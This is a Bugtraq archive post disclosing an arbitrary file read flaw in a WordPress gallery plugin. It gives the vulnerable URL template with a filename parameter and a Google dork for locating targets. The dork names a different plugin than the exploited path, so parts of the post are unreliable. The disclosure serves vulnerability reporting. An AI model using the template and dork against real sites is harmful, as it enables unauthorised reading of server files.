Bugtraq mailing list archives
Wordpress gallery-3.8.3 plugin Arbitrary File Read Vulnerability
From: Beni_vanda () yahoo com
Date: Thu, 10 Jan 2013 13:01:18 GMT
a bug in Wordpress gallery-3.8.3 plugin that allows to us to occur a Arbitrary File Read on a Local machin ################################################################################​############## # # Exploit Title : Wordpress gallery-3.8.3 plugin Arbitrary File Read Vulnerability # # Author : IrIsT.Ir # # Discovered By : Beni_Vanda # # Home : http://IrIsT.Ir/forum/ # # Software Link : http://wordpress.org/extend/plugins/gallery-plugin/ # # Security Risk : High # # Version : All Version # # Tested on : GNU/Linux Ubuntu - Windows Server - win7 # # Dork : inurl:plugins/nextgen-gallery # ################################################################################​############## # # Expl0iTs : # # [Target]/wp-content/plugins/gallery-plugin/gallery-plugin.php?filename_1=[AFR] # # ################################################################################​############## # # Greats : Amir - B3HZ4D - C0dex - TaK.FaNaR - Dead.Zone - nimaarek - m3hdi - F@rid - dr.tofan # # and All Members In Www.IrIsT.Ir/forum # ################################################################################​##############
Current thread:
- Wordpress gallery-3.8.3 plugin Arbitrary File Read Vulnerability Beni_vanda (Jan 10)
- Re: Wordpress gallery-3.8.3 plugin Arbitrary File Read Vulnerability Henri Salo (Jan 11)
- Re: Wordpress gallery-3.8.3 plugin Arbitrary File Read Vulnerability Paolo Perego (Jan 16)
- Re: Wordpress gallery-3.8.3 plugin Arbitrary File Read Vulnerability Henri Salo (Jan 11)